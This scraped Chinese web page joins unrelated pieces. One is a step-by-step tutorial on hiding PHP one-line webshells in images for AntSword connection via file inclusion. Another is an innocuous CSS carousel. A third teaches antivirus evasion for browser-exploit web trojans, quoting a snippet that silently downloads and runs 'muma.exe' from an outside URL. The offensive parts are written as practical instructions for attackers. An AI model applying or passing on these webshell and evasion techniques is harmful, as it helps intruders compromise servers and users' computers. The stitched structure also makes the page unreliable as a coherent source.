整合营销服务商

电脑端+手机端+微信端=数据同步管理

免费咨询热线:

黑客这样控制你电脑!做一个图片木马的四种方法(详细步骤)

片马:就是在图片中隐藏一句话木马。利用.htaccess等解析图片为PHP或者asp文件。达到执行图片内代码目的

制作方法:

  1. 文本方式打开,末尾粘贴一句话木马
  2. cmd中 copy 1.jpg/b+2.php 3.jpg
  3. /b是二进制形式打开
  4. /a是ascii方式打开
  5. 看到有人说一定要把图片放前面,木马放后面才能成功,我亲自试了这两种制作方式(另一种图片放后面),均能成功连接,但是后者的一句话木马在文件开头,不推荐
  6. 16进制打开图片在末尾添加一句话木马。
  7. ps

注意以下几点:

  • 单纯的图片马并不能直接和蚁剑连接,
  • 因为该文件依然是以image格式进行解析,
  • 只有利用文件包含漏洞,才能成功利用该木马
  • 所谓文件包含漏洞,是指在代码中引入其他文件作为php文件执行时,未对文件进行严格过滤,导致用户指定任意文件,都作为php文件解析执行。

1.文本方式打开图片直接粘贴一句话木马

将一个图片以文本格式打开(这里用的notepad++.以记事本方式打开修改也能连接成功,不过修改后图片无法正常显示了),
后面粘贴上一句话木马

上传图片

连接蚁剑,嗯,很好,连接成功

2.cmd命令行执行

在windows的cmd中执行

可以看到末尾已经有一句话木马了

上传之后连接试试,成功

3.用16进制编辑器打开,末尾添加

用winhex打开图片,添加一句话木马

上传,连接成功

4.用PhotoShop制作

先打开图片

点击文件->文件简介

添加木马

上传,连接成功

原文链接:https://www.cnblogs.com/Linkas/p/15101706.html


转木马

前言

有些小伙伴0基础小伙伴担心,我没有编程工具怎么办?

这个不需要编程工具的,只需要找9张图片改改名称就行

步骤

(1) 新建一个文件夹

(2) 文件夹中新建img文件夹 以及一个txt文档

(3) 把我放在下面的代码粘贴到txt文档中

(4)没有txt后缀的这样设置一下(这里以win11为例,点击查看-->显示-->文件扩展名)

(5)把文本文档名称改为旋转木马.html

(6)把图片放在img文件夹里面,需要9张

(7)图片重命名为 1.jpg 2.jpg 3.jpg 以此规律命名(200 x 300 像素的图片)

(8)设置图片像素(用win自带照片软件打开-->点击... --> 重设大小-->自定义尺寸-->把宽度改成200、高度改成200-->保存)

代码

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        *{
            margin: 0;
            padding: 0;
        }
        .box{
            width: 200px;
            height: 300px;
            /* border: 1px solid black; */
            margin: 50px auto;
            position: relative;
            /* 设置3D 效果 */
            transform-style: preserve-3d;
            /* 添加3D视距  透视效果 */
            /* perspective: 300px; */
            transform: rotateX(-15deg);
            /* CSS animation动画属性 
                name 定义动画名称
                duration 定义动画执行时间   秒/单位
                timing-function 定义动画执行速度 linear 匀速
                delay 定义动画执行等待 秒/单位
                iteration-count 定义动画执行次数 默认为1  无限执行 infinite
                animation-play-state 动画运行状态控制 默认running运行  paused 暂停
            */
            /* animation: name duration timing-function delay iteration-count direction fill-mode; */
            animation: move 10s linear infinite;
        }
        /* 定义关键帧动画  执行我们定义的动画 */
        @keyframes move{
            0%{
                /* 在CSS3 变幻属性中  如果要给一个元素添加多个变幻属性
                    需要将所有的变幻属性都写在transform
                 */
                transform:rotateX(-15deg) rotateY(0deg);
            }
            100%{
                transform:rotateX(-15deg) rotateY(360deg);
            }
        }
        /* :hover 伪类选择器  设置用户鼠标移入时的效果 */
        .box:hover{
            /* 当用户鼠标移入时 动画由默认的运行状态变成暂停 */
            animation-play-state: paused;
        }
        .box div{
            position: absolute;
            left: 0;
            top: 0;
            width: 200px;
            height: 300px;
            margin-top: 50px;
        }
        /* :nth-child(1) */
        .box div:nth-child(1){
            /* 改变页面第一张图片 变幻属性
            transform  变幻属性
            rotate  旋转
            translate 位移
             */
            transform: rotateY(40deg) translateZ(275px);
        }
        .box div:nth-child(2){
            transform: rotateY(80deg) translateZ(275px);
        }
        .box div:nth-child(3){
            transform: rotateY(120deg) translateZ(275px);
        }
        .box div:nth-child(4){
            transform: rotateY(160deg) translateZ(275px);
        }
        .box div:nth-child(5){
            transform: rotateY(200deg) translateZ(275px);
        }
        .box div:nth-child(6){
            transform: rotateY(240deg) translateZ(275px);
        }
        .box div:nth-child(7){
            transform: rotateY(280deg) translateZ(275px);
        }
        .box div:nth-child(8){
            transform: rotateY(320deg) translateZ(275px);
        }
        .box div:nth-child(9){
            transform: rotateY(360deg) translateZ(275px);
        }
    </style>
</head>
<body>
    <div class="box">
        <div>
            <img src="./img/1.jpg" alt="">
        </div>
        <div>
            <img src="./img/2.jpg" alt="">
        </div>
        <div>
            <img src="./img/3.jpg" alt="">
        </div>
        <div>
            <img src="./img/4.jpg" alt="">
        </div>
        <div>
            <img src="./img/5.jpg" alt="">
        </div>
        <div>
            <img src="./img/6.jpg" alt="">
        </div>
        <div>
            <img src="./img/7.jpg" alt="">
        </div>
        <div>
            <img src="./img/8.jpg" alt="">
        </div>
        <div>
            <img src="./img/9.jpg" alt="">
        </div>
    </div>
</body>
</html>


上一篇:ABB机器人Sockets通讯

近一段时间,很多国内知名的应用程序都出现了很严重的安全漏洞,而这些漏洞的运用方法也都出奇地一致——网页木马。可是网页木马和木马程序一样,一经推出就会很快被杀毒软件所查杀。关于木马程序的免杀已经介绍过很多了,今天就来看看网页木马是如何进行免杀制作的。

一.百度搜索网页木马

百度搜霸漏洞是由于BaiduBar.dll ActiveX控件中存在一个可以供远程代码执行的高危漏洞。运行百度搜霸漏洞网页木马生成器来创建一个自己需要的网页木马文件。分别利用瑞星和卡巴斯基对这个文件进行查杀,发现目前只有瑞星可以对这个文件进行查杀。

现在我们就利用常见的源代码折半法来进行文件特征码的寻找井进行查杀,所谓源代码折半法,就是把源代码从中一分为二,接替来查看哪一部分代码被杀,如果发现两层以上的特征码再将这段分开,然后依次类推缩小范围,最终找到文件中特征码的所在位置,这也是网页木马免杀最常用的检测方法。

由于百度搜霸网页木马的代码很少很清晰,因此制作免杀起来还是有一定的难度的,所以我们只能从文件代码中间进行修改操作。举个例子,比如说“( "http://www.weixanmanbu.com/cak.cab","muma .exe",0)”,这段代码是网页木马先利用DloadDS()函数下载CAB文件,然后在本地将其转化为可执行文件再运行,在这段代码最后有一个参数0,它的作用就是让下载的文件不显示给用户。我们只需要把参数0改为1,网页木马文件就可以起到免杀的效果了。不过问题也随之而来了,改成1后网页木马会弹出一个提示窗口,这个样子很容易被发现并引起用户的怀疑。那应该怎么办呢?其实操作起来很简单。我们只需要将参数0改为00,就可以轻易的躲过瑞星杀毒软件的检测。

二.PPStream网页木马

PPStream网页木马是通过PPStream的堆栈溢出产生的。首先还是通过PPStream漏洞生成器来创建一个网页木马文件,接着通过金山毒霸对其进行查杀,毋庸置疑已经被查杀了。我们还是先通过源代码折半法来确定特征码的位置,经过测试发现特征码处于<objeot id="ppc" Classid=”CLSID:5EC7C511-CDOF-42E6-830C-1BD9882F3458">这段中。其实制作过免杀网页木马的用户一眼就可以看出,问题一定是在ppc这个参数里面,因为参数从来就是杀毒软件特征码的提取内容。我们将ppc改为duba,然后网页木马文件就免杀了。不过需要大家注意的是,这段代码和后面的是相连的,因此只要使用ppc参数的,就需要改成duba才可以。这个方法对于其它的杀毒软件,比如瑞星也可以起到免杀的效果。

三.暴风影音网页木马

暴风影音网页木马是由于暴风影音II中mps.dll组件多个缓冲区溢出漏洞造成的,也是近期非常热门的一个软件漏洞。创建好我们的网页木马后进仟查杀,发现很多杀毒软件都能够将其查杀。同样通过路改参数就可以避过金山毒霸的查杀,但却无法过瑞星和卡巴斯基。

我们找到memory=new Array();,接着在其下面添加一句google=memory。本来变量memory是直接转向new Array()的,现在我们在中间添加了一句新的代码,这样就让google先转到变量memory,然后再从memory转向new Array()。实际上就是让代码多走了一步路,这在程序中本来是不应该存在的,这么做就相当于在网页代码里而添加了一段花指令。保存修改后再查杀网页木马文件,发现已经通过了瑞星的检测。

网页木马的免杀除了这种修改源代码的方法外。还可以利用代码加密的方法来进行免杀操作。网页木马的加密方法有很多,常用的就是微软的JScript.Encode脚本来加密,当然用户自己编写加密函数效果会更好。现在同上这种在线进行JScript.Encode加密解密的网页也有很多,只需要将网页木马源代码粘贴在网页的输入框内,接着按“Encodc解密”按钮就可以了。需要用户注意的是,加密时应该只对脚本部分进行加密,不需要对<script language="">脚本标记进行加密,并且加密后脚本标记应该改为<script language ="JScript.Encode">。

到此为止,关于网页木马免杀的相关内容就为大家介绍到这儿,从上面的介绍我们可以看到,网页木马免杀的方法相对于可执行文件来说还是非常有限的。不过用户只需要利用好过有限的方法,就可以将网页木马隐形于众多的杀毒软件面前,当然这种方法也适用于ASP、PHP这样的网页木马。

本文来自 危险漫步博客 转载请注明;

本文地址:http://www.weixianmanbu.com/article/1143.html